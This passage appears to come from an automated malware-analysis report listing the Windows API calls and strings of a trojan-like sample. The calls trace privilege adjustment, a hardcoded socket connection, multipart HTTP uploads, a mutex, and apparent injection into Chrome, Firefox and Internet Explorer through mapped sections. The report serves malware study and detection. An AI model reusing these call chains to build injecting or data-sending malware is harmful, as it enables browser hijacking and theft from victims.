      • Part of subcall function 00EFBDCF: CloseHandle.KERNEL32(00000000), ref: 00EFBDF2
    APIs
    • GetCurrentProcess.KERNEL32 ref: 00EF5317
    • OpenProcessToken.ADVAPI32(00000000), ref: 00EF531E
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00EF5339
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 00EF5356
    • CloseHandle.KERNEL32(?), ref: 00EF5361
    APIs
    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00EF62CE
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EF62EE
    • GetLastError.KERNEL32(?,?), ref: 00EF62FB
    • InternetCloseHandle.WININET(?), ref: 00EF6306
    • SetLastError.KERNEL32(00000000,?,?), ref: 00EF630D
    Strings
    • Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36, xrefs: 00EF62C9
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EFB94B: CloseHandle.KERNEL32(00000000), ref: 00EFB982
    • wsprintfA.USER32(?,00EFE4E4,?,?,?,?,?,?,00EFCC08,00000002,?,00EFCDA4), ref: 00EFCBD1
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF388A: wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
      • Part of subcall function 00EFB8C5: GetExitCodeProcess.KERNEL32(?,00000000), ref: 00EFB8D9
      • Part of subcall function 00EFB8C5: CloseHandle.KERNEL32(?), ref: 00EFB8EF
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • GetLastError.KERNEL32 ref: 00EF6AC7
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00EF6B0C
    • ReadFile.KERNEL32(?,?,00800000,?,00000000), ref: 00EF6B29
    • FlushFileBuffers.KERNEL32(?), ref: 00EF6B47
    • DisconnectNamedPipe.KERNEL32(?), ref: 00EF6B4F
    • CloseHandle.KERNEL32(?), ref: 00EF6B57
    APIs
    • lstrlenA.KERNEL32(00000540,00000000,?,00000000,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000), ref: 00EF4ECA
    • lstrlenA.KERNEL32(00000644,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4ECF
    • lstrlenA.KERNEL32(00000440,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4EDA
    • lstrlenA.KERNEL32(00000000,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4EE1
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • wsprintfA.USER32(00000000,/%s/%s/%d/%s/%s/,00000540,00000440,00000001,00000000,00000644,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10), ref: 00EF4F19
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF6124
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF612C
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF6134
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    APIs
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EF5E1B
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EF5E32
    • CloseHandle.KERNEL32(00000000), ref: 00EF5E3F
    • lstrlenA.KERNEL32(00000000,00000080,00000002), ref: 00EF5E71
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • CloseHandle.KERNEL32(?), ref: 00EF5EA3
    • CloseHandle.KERNEL32(?), ref: 00EF5EAB
    APIs
    • lstrcmpA.KERNEL32(?,-00000540,?,00000000), ref: 00EF4B04
    • lstrcmpA.KERNEL32(?,-00000440), ref: 00EF4B41
    • lstrcmpA.KERNEL32(00000000,00000000), ref: 00EF4B75
    • StrToIntA.SHLWAPI(00000000), ref: 00EF4BAA
    APIs
    • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EF546B
    • GetProcAddress.KERNEL32(00000000), ref: 00EF5472
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EF5484
    APIs
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • lstrlenA.KERNEL32(00000540,00000000,02908008,00000000,?,0294FEF4,00EF3E47,0294FF14,00000003,00000000,00000002,00000002,00000000,00F032D0,?,0294FF1C), ref: 00EF40DC
    • lstrlenA.KERNEL32(00000644,?,0294FEF4,00EF3E47,0294FF14,00000003,00000000,00000002,00000002,00000000,00F032D0,?,0294FF1C,00EFC957,00000003,0294FF18), ref: 00EF40E8
    • lstrlenA.KERNEL32(00000440,?,0294FEF4,00EF3E47,0294FF14,00000003,00000000,00000002,00000002,00000000,00F032D0,?,0294FF1C,00EFC957,00000003,0294FF18), ref: 00EF40F6
    • wsprintfA.USER32(00000000,/%s/%s/5/%s/%s/,00000540,00000440,00000003,00000644,?,0294FEF4,00EF3E47,0294FF14,00000003,00000000,00000002,00000002,00000000,00F032D0), ref: 00EF412E
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    APIs
    • inet_addr.WS2_32(FD9BF563), ref: 00EFAA93
    • socket.WS2_32(00000002,00000001,00000000), ref: 00EFAAAA
    • htons.WS2_32(000001BB), ref: 00EFAAD1
    • connect.WS2_32(00000000,0294FE9C,00000010), ref: 00EFAAE2
    • closesocket.WS2_32(00000000), ref: 00EFAAEB
    APIs
    • wsprintfA.USER32(?,--%sContent-Disposition: form-data; name="%s",FFFECD63,00000000,00000000,?,0294FEC8,00EF6071,?,000000A4,00000000,00000000,?,?,0294FEC4,00EF50F2), ref: 00EF5F73
    • lstrlenA.KERNEL32(?,00000000,,00000000,00000000,Content-Type: ), ref: 00EF5FA9
    APIs
    • GetWindowLongW.USER32(?,000000F0), ref: 00EFBB2B
    • GetWindowInfo.USER32(?,?), ref: 00EFBB3D
    • GetParent.USER32(?), ref: 00EFBB4F
    • SetActiveWindow.USER32(00000000), ref: 00EFBB56
    • PostMessageW.USER32(?,000000F5,00000000,00000000), ref: 00EFBB66
    APIs
    • GetVersionExW.KERNEL32(0294FE00), ref: 00EFC2E9
    • wsprintfA.USER32(0294FF1C,00EFE4E4,?), ref: 00EFC3BF
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF388A: wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
      • Part of subcall function 00EFB8C5: GetExitCodeProcess.KERNEL32(?,00000000), ref: 00EFB8D9
      • Part of subcall function 00EFB8C5: CloseHandle.KERNEL32(?), ref: 00EFB8EF
      • Part of subcall function 00EFBC05: CreateThread.KERNEL32(00000000,00000000,00EFBB78,00000000), ref: 00EFBC1C
      • Part of subcall function 00EFBC05: CloseHandle.KERNEL32(00000000), ref: 00EFBC23
      • Part of subcall function 00EFB94B: CloseHandle.KERNEL32(00000000), ref: 00EFB982
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    APIs
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • lstrlenA.KERNEL32(00000000), ref: 00EF3B37
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EF3B64
    • ReleaseMutex.KERNEL32 ref: 00EF3B8A
    APIs
    • HttpSendRequestExW.WININET(?,?,00000000,00000000,00000000), ref: 00EF622C
    • InternetWriteFile.WININET(?,?,00000400,00000000), ref: 00EF6267
    • HttpEndRequestW.WININET(?,00000000,00000000,00000000), ref: 00EF6283
    APIs
    • EnterCriticalSection.KERNEL32(?,?,00EF23AA,?,?,?), ref: 00EF24BC
    • SetEvent.KERNEL32(?), ref: 00EF250E
    • LeaveCriticalSection.KERNEL32(?), ref: 00EF258A
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    Strings
    • SERSPROFILE=C:\Documents and Settings\All Users, xrefs: 00EF2554
    APIs
    • StrStrA.SHLWAPI(?,/), ref: 00EF4BF1
    • StrToIntA.SHLWAPI(00000000), ref: 00EF4C1D
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    APIs
    • InitializeCriticalSection.KERNEL32 ref: 00EF241D
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00EF2428
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    APIs
    • lstrcmpA.KERNEL32(?,?,00000000,?,00000000), ref: 00EF43FA
    • lstrcmpA.KERNEL32(?,?), ref: 00EF4433
    • lstrcmpA.KERNEL32(?,?), ref: 00EF447A
    • lstrlenA.KERNEL32(?), ref: 00EF44AE
    • lstrcpyA.KERNEL32(?,00000000), ref: 00EF44C0
    APIs
    • wsprintfA.USER32(0294FBC0,/%s/%s/%d/%s/%s/,00000540,00000440,00000002,00000000,00000644,00000000), ref: 00EF5083
    • wsprintfA.USER32(0294FBC0,/%s/%s/%d/%s/,00000540,00000440,00000002,00000644,00000000), ref: 00EF50A5
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF6124
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF612C
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF6134
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF519F: LookupAccountSidW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00EF51C7
      • Part of subcall function 00EF519F: GetLastError.KERNEL32 ref: 00EF51D2
      • Part of subcall function 00EF519F: LookupAccountSidW.ADVAPI32(00000000,00000200,?,00000200,00000000,?,?), ref: 00EF5200
    • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00EF5223
    • GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00EF5242
    • GetLastError.KERNEL32 ref: 00EF5244
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • GetTokenInformation.ADVAPI32(?,00000001,00000000,?,?), ref: 00EF526C
    APIs
    • lstrlenA.KERNEL32(?,?), ref: 00EF4E3B
    • lstrlenA.KERNEL32(?), ref: 00EF4E42
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • wsprintfA.USER32(00000000,%s/%s/0,?,?), ref: 00EF4E61
      • Part of subcall function 00EF4EA6: lstrlenA.KERNEL32(00000540,00000000,?,00000000,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000), ref: 00EF4ECA
      • Part of subcall function 00EF4EA6: lstrlenA.KERNEL32(00000644,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4ECF
      • Part of subcall function 00EF4EA6: lstrlenA.KERNEL32(00000440,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4EDA
      • Part of subcall function 00EF4EA6: lstrlenA.KERNEL32(00000000,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4EE1
      • Part of subcall function 00EF4EA6: wsprintfA.USER32(00000000,/%s/%s/%d/%s/%s/,00000540,00000440,00000001,00000000,00000644,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10), ref: 00EF4F19
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    APIs
    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000040,00000000,000DA910,00000000), ref: 00EFD6B8
    • MapViewOfFile.KERNEL32(00000000,0000000E,00000000,00000000,00000000), ref: 00EFD6CA
    • CloseHandle.KERNEL32(0000960D), ref: 00EFD6FD
      • Part of subcall function 00EFD5F3: NtMapViewOfSection.NTDLL(00EFB303,0294FF2C,0294FEDC,00000000), ref: 00EFD620
    • UnmapViewOfFile.KERNEL32(00000000), ref: 00EFD6F5
    APIs
    • wsprintfA.USER32(?,00EFE4E4,?,00001000,Content-Length: ,00000000,00000000,?), ref: 00EF61CE
    Strings
    • Accept: text/htmlConnection: Keep-Alive, xrefs: 00EF61E1
    • Content-Length: , xrefs: 00EF61B7
    • Content-Type: multipart/form-data; boundary=, xrefs: 00EF6198
    APIs
    • lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
    • lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    APIs
    • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 00EF56E2
    • OpenProcessToken.ADVAPI32(00000000,00000002,00000000), ref: 00EF56F9
    • CloseHandle.KERNEL32(00000000), ref: 00EF571A
      • Part of subcall function 00EF56A8: DuplicateTokenEx.ADVAPI32(00000000,000F01FF,00000000,00000002,00000001,00000000), ref: 00EF56C2
    • CloseHandle.KERNEL32(00000000), ref: 00EF5717
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EFDC3F
    • Process32FirstW.KERNEL32(00000000,?), ref: 00EFDC59
      • Part of subcall function 00EFD99B: StrStrIW.SHLWAPI(?,chrome.exe), ref: 00EFD9B1
      • Part of subcall function 00EFD99B: StrStrIW.SHLWAPI(?,firefox.exe), ref: 00EFD9BF
      • Part of subcall function 00EFD99B: StrStrIW.SHLWAPI(?,iexplore.exe), ref: 00EFD9CD
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00EFDC7B
    • CloseHandle.KERNEL32(00000000), ref: 00EFDC8B
    APIs
    • GetWindowLongW.USER32(?,000000F0), ref: 00EFBAD2
    • SetActiveWindow.USER32(?), ref: 00EFBAF4
    • SendMessageW.USER32(?,000000F5,00000001,00000000), ref: 00EFBB05
    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EFBB0D
    APIs
    • wsprintfA.USER32(?,/%s/%s/%d/%s/,0000001F,?,00000000,?,?,00EF49A5,00000000,?,?,?,?), ref: 00EF4010
    • wsprintfA.USER32(?,/%s/%s/%d/%s/%s/,0000001F,?,00000000,00000000,?,?,00EF49A5,00000000,?,?,?,?), ref: 00EF402F
      • Part of subcall function 00EF3EC7: GetVersionExW.KERNEL32(?), ref: 00EF3EFA
      • Part of subcall function 00EF3EC7: wsprintfA.USER32(00000000,/%s/%s/0/%s/%d/%s/,?,0000001F,?,00000451,?), ref: 00EF3FCA
    APIs
    • GetTickCount.KERNEL32 ref: 00EF5EFE
    • wsprintfA.USER32(00000002,%sbound-%d,00000000,00000000), ref: 00EF5F11
    APIs
    • OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00EFD13A
    • CloseHandle.KERNEL32(00000000), ref: 00EFD145
    APIs
    • lstrlenA.KERNEL32(?,?,?,00000000,00400000,00400000,?,00EFC5A6,?,00000000,?,?,?,00EFC7EA,?,?), ref: 00EF6527
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • lstrlenA.KERNEL32(?,?,00EFC5A6,?,00000000,?,?,?,00EFC7EA,?,?,?,?), ref: 00EF6551
      • Part of subcall function 00EF541F: StrToIntA.SHLWAPI(0294FF32), ref: 00EF543B
      • Part of subcall function 00EF53DA: lstrlenA.KERNEL32(0295002C,00EF37D1,0294FF30,00F032D0,02908008), ref: 00EF53DB
    • lstrlenA.KERNEL32(?), ref: 00EF658B
    • wsprintfA.USER32(00000000,00EFE858,?), ref: 00EF65B0
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992